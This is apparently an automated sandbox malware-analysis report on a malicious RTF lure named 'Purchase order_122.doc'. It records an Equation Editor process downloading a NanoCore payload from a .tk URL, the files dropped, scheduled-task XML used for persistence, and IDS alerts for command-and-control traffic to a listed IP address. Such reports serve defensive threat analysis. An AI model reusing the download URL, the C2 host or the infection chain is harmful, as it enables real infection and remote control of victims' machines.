                                                          Joe Sandbox View:
                                                          • Filename: Purchase order_122.doc, Detection: malicious, Browse
                                                          • Filename: SWIFT COPY.doc, Detection: malicious, Browse
                                                          • Filename: Order Inquiry CEW PTE LTD.doc, Detection: malicious, Browse
                                                          • Filename: Ref 0180066743.xlsx, Detection: malicious, Browse
                                                          • Filename: 001Photocopy.xlsx, Detection: malicious, Browse
                                                          • Filename: SB883681QI.xlsx, Detection: malicious, Browse
                                                          • Filename: PO-No.00127.doc, Detection: malicious, Browse
                                                          • Filename: PO-14092021.doc, Detection: malicious, Browse
                                                          • Filename: PO-14092021.doc, Detection: malicious, Browse
                                                          • Filename: FACTURA PROFORMA- PO1122002092021.doc, Detection: malicious, Browse
                                                          • Filename: Expo Grup - 1122002092021 Sept.doc, Detection: malicious, Browse
                                                          • Filename: SWIFT COPY.doc, Detection: malicious, Browse
                                                          • Filename: P-C3787633.doc, Detection: malicious, Browse
                                                          • Filename: Account Statement.doc, Detection: malicious, Browse
                                                          • Filename: NEW Order-05271.doc, Detection: malicious, Browse
                                                          • Filename: NEW ORDER.doc, Detection: malicious, Browse
                                                          • Filename: Nanocore.New order 22.xlsx, Detection: malicious, Browse
                                                          • Filename: PO83783877.xlsx, Detection: malicious, Browse
                                                          • Filename: DOC.1000000567.267805032019.doc__.rtf, Detection: malicious, Browse
                                                          • Filename: DOO STILO NOVI SAD EUR 5.200,99 20210705094119.doc, Detection: malicious, Browse
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..S.................P... .......k... ........@.. ...............................X....@..................................k..K................................... k............................................... ............... ..H............text....K... ...P.................. ..`.rsrc................`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:downloaded
                                                          Size (bytes):368128
                                                          Entropy (8bit):7.943323696866316
                                                          Encrypted:false
                                                          SSDEEP:6144:biuHodpZO0/zxllEpjNGLTk+eRSMjf9oHpqUFNsWPAyJt4SKbxF+wkonJx:upZOu7EpjAnkR/9a9rsWPAmyScxFRb
                                                          MD5:ACE96CF7EF24EEAC993B4DA172A5A8F0
                                                          SHA1:FA89615F55A87EF1D9EE9330EC5B0C040F54E8C1
                                                          SHA-256:D4EE80500D9C280E85B290B467592A5910E9D4EE127CFDA17AD40467B2C88942
                                                          SHA-512:E1D5279223D7E82003BAD73E94B1607B043C0B987987E99DC39AB9790558C4C840CD6949A37F87134FBD13B64C4A2492FB572EEBDE870DB709D2A77C419C7EA1
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          IE Cache URL:http://binatonezx.tk/catzx.exe
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.wa..............0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........?...A......}........1............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*....0..8........s....%.Bo.....%.Po.....%.Do.....%.Io.....%.Wo......+..*.0..8........s....%.oo.....%.+o.....%.-o.....%.*o.....%.=o......+..*".(.....*....0.. ..............%.r...p.%.r7..p.%....+..*&.(......*...0..0.........o#....oO...3..o%....oQ.....+....,....+....+..*.0..0.........o#....o#...3..o%....o%.....+....,....+....
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2D531D94-C583-4137-BC9C-F35D458886D0}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):1.3496338424734096
                                                          Encrypted:false
                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb/:IiiiiiiiiifdLloZQc8++lsJe1MzGl
                                                          MD5:19F47639FEF6B71145F3D48FFB0BCDD3
                                                          SHA1:5A8194771857F03247BAE4FCC84604655FD373D3
                                                          SHA-256:86A7A8F9F015E15CE88322AA2B00EC3E41048CE99D448D00BC9C2ECE4F5FCF70
                                                          SHA-512:6540E8B8C4731FA6EBC05CCB19C433A125119AB29D639701F1F605B7DDC79717EA5CE3438F8129DE1BA60DD1A7C9233FE6BF211A9A172E685F0CB949E2B95918
                                                          Malicious:false
                                                          Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9294EB41-BC98-4811-8155-5BA310CE0BF9}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B46515BE-EB2B-43E1-A77A-ECFC555EC443}.tmp
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):3.556355218887951
                                                          Encrypted:false
                                                          SSDEEP:192:GW0Jifys7CSDuVIMUycP6T6K6HShBHkVday7IzL2P+mpltOzwIvaL6HYyzOpZijH:GW0IfysOSDuVpzhiSUVYysn2P+mpl8UU
                                                          MD5:988803A25CD76F90623197D3B1CE36DD
                                                          SHA1:435661EFFA5B938E38207C3EB8B1674714C55250
                                                          SHA-256:A9FD08135BE9B98E590733B892CFDD845C8C749DD21090C75A7DE2EA285C48BD
                                                          SHA-512:5C1CBC6385E6434AB1957F1A16A9709DEA56324D678F66DF72417FEE4F1CA30F6C387B3A73FE8FAD2D3B5C2BF875565F9E3CBB13AFBC4B29A83033F3A1416A0D
                                                          Malicious:false
                                                          Preview: !.1./.<.7.3.?.@.2.<.@.?.1...[.$.^.?.1...*.;.%.].).3.&.3.!.?.=.@.?.6.].~.!.0.[.^.].?.?.%.0...?.].?.?.=.`.?.=...4.$.#...~.6.#.5.4.[...@...?.:.0.6.8.$.3.?.3.(.[.^.?.;.(.7.@.?.^.4.$.0.&.*.`.[.).'.+...7.?.&.2.1.@.[.+.[.$.].1.<.;.].|.6.=.0.?....._.0.-.&.&.%.|.?.)...-.0.,.1.%...?.^.!.~.]...?.!.5.[.|.7.?.4.].3.(.|.!.(./.-._._.?...7.&.(.*.2.0.7.6.@.8.~.?.6.?.$.?.~.;.?.|.8.].8.?.0.+.]...%./.%.?.~.5.[...@.&.-.?.3.7.?.5.0.^.(.!.8.'.?.%.&.1.=.`...?.+.?.+.?.4.|.3.7.1.6.6.^.4.3.0.8.>./.#.+.?.,._.?.$.>.9.1.|.[.?.-.*.../.(.@.@.?.[.?.-.1.5.>.5.$.8.=.'.6...?...,.`.'.?.^.0...-.*.*.[.%.:...9.].7.2...!._.).!...].3.>.$.|.5.'.^.<.,.9.;.'.2.%.5.`.6.@.6.5.,._.?.*.`.8./.8.5.?.=.#.(.9.?._.%.0.7.4.?.!.'.?...(.?.)...?.4.7.?.5.0.=.?.`.6.:.&.%.;.,.3.*.|.0.3.<.%...5.>.%.*.9.6.-.%.$.9.$.7.0.).~...[.=.9.1.2.~._.3.|.;...?.|.*...~.%./.%.3.?...@...&.7.,.*.*.5.~...9.;.4...+.2.,.%.,.5.?...,.^.`._.?...5._.).<.^.8.=.:.8.4.%.4.].3.*.#.>.$.6.?.^.3.@.&.1.(.].&...,.?.+.?.:.(...^.?..._.6.5.:..._.|.>.`.1.7.&...?.:.,.(.%.,.?.[.#.8.1.
                                                          C:\Users\user\AppData\Local\Temp\tmp1E64.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1310
                                                          Entropy (8bit):5.1063907901076036
                                                          Encrypted:false
                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Rl4xtn:cbk4oL600QydbQxIYODOLedq3Sl4j
                                                          MD5:CFAE5A3B7D8AA9653FE2512578A0D23A
                                                          SHA1:A91A2F8DAEF114F89038925ADA6784646A0A5B12
                                                          SHA-256:2AB741415F193A2A9134EAC48A2310899D18EFB5E61C3E81C35140A7EFEA30FA
                                                          SHA-512:9DFD7ECA6924AE2785CE826A447B6CE6D043C552FBD3B8A804CE6722B07A74900E703DC56CD4443CAE9AB9601F21A6068E29771E48497A9AE434096A11814E84
                                                          Malicious:false
                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                          C:\Users\user\AppData\Local\Temp\tmp249A.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):5.135021273392143
                                                          Encrypted:false
                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mn4xtn:cbk4oL600QydbQxIYODOLedq3Z4j
                                                          MD5:40B11EF601FB28F9B2E69D36857BF2EC
                                                          SHA1:B6454020AD2CEED193F4792B77001D0BD741B370
                                                          SHA-256:C51E12D18CC664425F6711D8AE2507068884C7057092CFA11884100E1E9D49E1
                                                          SHA-512:E3C5BCC714CBFCA4B8058DDCDDF231DCEFA69C15881CE3F8123E59ED45CFB5DA052B56E1945DCF8DC7F800D62F9A4EECB82BCA69A66A1530787AEFFEB15E2BD5
                                                          Malicious:false
                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                          C:\Users\user\AppData\Local\Temp\tmp566B.tmp
                                                          Process:C:\Users\user\AppData\Roaming\catzjt7863.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1619
                                                          Entropy (8bit):5.149397668697177
                                                          Encrypted:false
                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB8tn:cbhZ7ClNQi/rydbz9I3YODOLNdq30
                                                          MD5:AA0D2C398EDA2B348EF81AEC7D42D1A4
                                                          SHA1:3CA6B4806670F5D6A8E956FDA8A45BF8CF9623AB
                                                          SHA-256:FBE1D53BEC4781637355317A441AB01E366BCDF1B6B6C05CC90D8E57ECD572C7
                                                          SHA-512:6AF5E9A8144D486B7DE244CC39C4C4ECA99173E3E6FCBBBCC15B09C18BD8A1AE21BCDA43CAA807E1BABF2A723F44853FCF80A2BA119B0DB928C76747BFD256B1
                                                          Malicious:true
                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                          C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):232
                                                          Entropy (8bit):7.089541637477408
                                                          Encrypted:false
                                                          SSDEEP:3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
                                                          MD5:9E7D0351E4DF94A9B0BADCEB6A9DB963
                                                          SHA1:76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
                                                          SHA-256:AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
                                                          SHA-512:93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
                                                          Malicious:false
                                                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&
                                                          C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:dsE:F
                                                          MD5:0B2A8DE244B465CEE106CFB4A8C72E54
                                                          SHA1:C3114CEEEDB5B68D136320D49FE324074F4EDCEF
                                                          SHA-256:A688D2C2784CF368CFDCF621BA67CA62225E9EA3DB0D5DB2DC151BA430A920BC
                                                          SHA-512:1519817080200B27FE65785431178B6D75DAA115B5BC7C255A8B7D6A3754140FEDA2AFAAEA018F96A3F6708EFA46539ABCE92AACF0B1A10E202B07E777678593
                                                          Malicious:true
                                                          Preview: ..A...H
                                                          C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\task.dat
                                                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):57
                                                          Entropy (8bit):4.795707286467131
                                                          Encrypted:false
                                                          SSDEEP:3:oMty8WbSX/MNn:oMLWus
                                                          MD5:D685103573539B7E9FDBF5F1D7DD96CE
                                                          SHA1:4B2FE6B5C0B37954B314FCAEE1F12237A9B02D07
                                                          SHA-256:D78BC23B0CA3EDDF52D56AB85CDC30A71B3756569CB32AA2F6C28DBC23C76E8E
                                                          SHA-512:17769A5944E8929323A34269ABEEF0861D5C6799B0A27F5545FBFADC80E5AB684A471AD6F6A7FC623002385154EA89DE94013051E09120AB94362E542AB0F1DD
                                                          Malicious:false
                                                          Preview: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Purchase order_122.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Tue Oct 26 20:31:28 2021, length=444924, window=hide
                                                          Category:dropped
                                                          Size (bytes):1054
                                                          Entropy (8bit):4.549567670793201
                                                          Encrypted:false
                                                          SSDEEP:12:86M+N6W0gXg/XAlCPCHaXeBhB/OW9qX+W1SpI+nicvbgNA6BsxDtZ3YilMMEpxRy:86Mr/XTuzLIDUie8wxDv3qfE/7Eg
                                                          MD5:549CE2F3B3FDEEC003F6062032D029B9
                                                          SHA1:598B34A40DEF3EA52AC02D4D441B2FB5AAC56CC3
                                                          SHA-256:0FF5F7CD6C64F4BFF66588A7F61817DEDEA410963DC485B02D4A12BA2D8A6C92
                                                          SHA-512:1F137A5FD57B96DE6D72F3E77C9D3403824654D8565251F9401B77E79100DE30B23510CD7C8F31E6A36C4C26911ED5B67D09F83B5EE143F80D55A4674AF26606
                                                          Malicious:false
                                                          Preview: L..................F.... ....5??....5??...[&H.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.....ZS. .PURCHA~1.DOC..Z.......S...S..*.........................P.u.r.c.h.a.s.e. .o.r.d.e.r._.1.2.2...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\305090\Users.user\Desktop\Purchase order_122.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.u.r.c.h.a.s.e. .o.r.d.e.r._.1.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......305090..........D_....3N...W..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):87
                                                          Entropy (8bit):4.7123532674005935
                                                          Encrypted:false
                                                          SSDEEP:3:bDuMJlt34KRAX6UXbUmX1aWN4KRAX6UXbUv:bCmoAAX/XbWNAAX/Xb2
                                                          MD5:E2959B2A21E56E70B894EDC112E0A96B
                                                          SHA1:857750C5F3AF616DB86FAF8E5316DF2FCA3FC5E9
                                                          SHA-256:F31756BA08839BD02B995013BA7FC5C708C7FB43F35DD05AA1826105DE787342
                                                          SHA-512:53B1CE40D002ED2656147AA41C8CB1BFE1A111A36E1C998F06D744E0C8A6215F34C135FF4F62FF95812D22DDE78562D5B6681816700C0D0D56325C08F2875073
                                                          Malicious:false
                                                          Preview: [folders]..Templates.LNK=0..Purchase order_122.LNK=0..[doc]..Purchase order_122.LNK=0..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                          C:\Users\user\AppData\Roaming\catzjt7863.exe
                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):368128
                                                          Entropy (8bit):7.943323696866316
                                                          Encrypted:false
                                                          SSDEEP:6144:biuHodpZO0/zxllEpjNGLTk+eRSMjf9oHpqUFNsWPAyJt4SKbxF+wkonJx:upZOu7EpjAnkR/9a9rsWPAmyScxFRb
                                                          MD5:ACE96CF7EF24EEAC993B4DA172A5A8F0
                                                          SHA1:FA89615F55A87EF1D9EE9330EC5B0C040F54E8C1
                                                          SHA-256:D4EE80500D9C280E85B290B467592A5910E9D4EE127CFDA17AD40467B2C88942
                                                          SHA-512:E1D5279223D7E82003BAD73E94B1607B043C0B987987E99DC39AB9790558C4C840CD6949A37F87134FBD13B64C4A2492FB572EEBDE870DB709D2A77C419C7EA1
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.wa..............0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........?...A......}........1............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*....0..8........s....%.Bo.....%.Po.....%.Do.....%.Io.....%.Wo......+..*.0..8........s....%.oo.....%.+o.....%.-o.....%.*o.....%.=o......+..*".(.....*....0.. ..............%.r...p.%.r7..p.%....+..*&.(......*...0..0.........o#....oO...3..o%....oQ.....+....,....+....+..*.0..0.........o#....o#...3..o%....o%.....+....,....+....
                                                          C:\Users\user\AppData\Roaming\eWoGxZG.exe
                                                          Process:C:\Users\user\AppData\Roaming\catzjt7863.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):368128
                                                          Entropy (8bit):7.943323696866316
                                                          Encrypted:false
                                                          SSDEEP:6144:biuHodpZO0/zxllEpjNGLTk+eRSMjf9oHpqUFNsWPAyJt4SKbxF+wkonJx:upZOu7EpjAnkR/9a9rsWPAmyScxFRb
                                                          MD5:ACE96CF7EF24EEAC993B4DA172A5A8F0
                                                          SHA1:FA89615F55A87EF1D9EE9330EC5B0C040F54E8C1
                                                          SHA-256:D4EE80500D9C280E85B290B467592A5910E9D4EE127CFDA17AD40467B2C88942
                                                          SHA-512:E1D5279223D7E82003BAD73E94B1607B043C0B987987E99DC39AB9790558C4C840CD6949A37F87134FBD13B64C4A2492FB572EEBDE870DB709D2A77C419C7EA1
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.wa..............0.................. ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........?...A......}........1............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*....0..8........s....%.Bo.....%.Po.....%.Do.....%.Io.....%.Wo......+..*.0..8........s....%.oo.....%.+o.....%.-o.....%.*o.....%.=o......+..*".(.....*....0.. ..............%.r...p.%.r7..p.%....+..*&.(......*...0..0.........o#....oO...3..o%....oQ.....+....,....+....+..*.0..0.........o#....o#...3..o%....o%.....+....,....+....
                                                          C:\Users\user\Desktop\~$rchase order_122.doc
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.5038355507075254
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                          Malicious:false
                                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                          Static File Info

                                                          General

                                                          File type:Rich Text Format data, unknown version
                                                          Entropy (8bit):4.216719254525903
                                                          TrID:
                                                          • Rich Text Format (5005/1) 55.56%
                                                          • Rich Text Format (4004/1) 44.44%
                                                          File name:Purchase order_122.doc
                                                          File size:444924
                                                          MD5:725c046a9a1bd2456115102985d98dd4
                                                          SHA1:dce11d03bb6838c7761865f5149251d01df65946
                                                          SHA256:9f33c3635ba0c704775ea7c0388955e5649ab913987d990e05f121b6c1681b7c
                                                          SHA512:b2c8c5d2083d6f0b4dd468f9ca191d750e3ffd90bde4fea6e4ee2b88576b9ece5200902482120dcbada52cf0704c743c5539f5b47f268dd6792e0e812142cedb
                                                          SSDEEP:12288:VJfmPBkpevzNkw/AI/OJns8us28f+ngR1CFmBuL:XfmmQHAfJns8uKKW1CFmK
                                                          File Content Preview:{\rtf8860!1/<73?@2<@?1.[$^?1.*;%])3&3!?=@?6]~!0[^]??%0.?]??=`?=.4$#.~6#54[.@.?:068$3?3([^?;(7@?^4$0&*`[)'+.7?&21@[+[$]1<;]|6=0?.._0-&&%|?).-0,1%.?^!~].?!5[|7?4]3(|!(/-__?.7&(*2076@8~?6?$?~;?|8]8?0+].%/%?~5[.@&-?37?50^(!8'?%&1=`.?+?+?4|37166^4308>/#+?,_?$>

                                                          File Icon

                                                          Icon Hash:e4eea2aaa4b4b4a4

                                                          Static RTF Info

                                                          Objects

                                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                          0000016B2hno
                                                          100001677hno

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          10/26/21-14:32:46.286372UDP254DNS SPOOF query response with TTL of 1 min. and no authority53505918.8.8.8192.168.2.22
                                                          10/26/21-14:32:46.751389TCP2025019ET TROJAN Possible NanoCore C2 60B491661665192.168.2.22103.133.109.121
                                                          10/26/21-14:32:51.536900UDP254DNS SPOOF query response with TTL of 1 min. and no authority53578058.8.8.8192.168.2.22
                                                          10/26/21-14:32:51.555779UDP254DNS SPOOF query response with TTL of 1 min. and no authority53578058.8.8.8192.168.2.22
                                                          10/26/21-14:32:51.857034TCP2025019ET TROJAN Possible NanoCore C2 60B491671665192.168.2.22103.133.109.121
                                                          10/26/21-14:32:58.064655TCP2025019ET TROJAN Possible NanoCore C2 60B491681665192.168.2.22103.133.109.121
                                                          10/26/21-14:33:10.754621TCP2025019ET TROJAN Possible NanoCore C2 60B491691665192.168.2.22103.133.109.121
                                                          10/26/21-14:33:16.896073UDP254DNS SPOOF query response with TTL of 1 min. and no authority53556168.8.8.8192.168.2.22
                                                          10/26/21-14:33:17.220855TCP2025019ET TROJAN Possible NanoCore C2 60B491701665192.168.2.22103.133.109.121
                                                          10/26/21-14:33:23.148868UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499728.8.8.8192.168.2.22
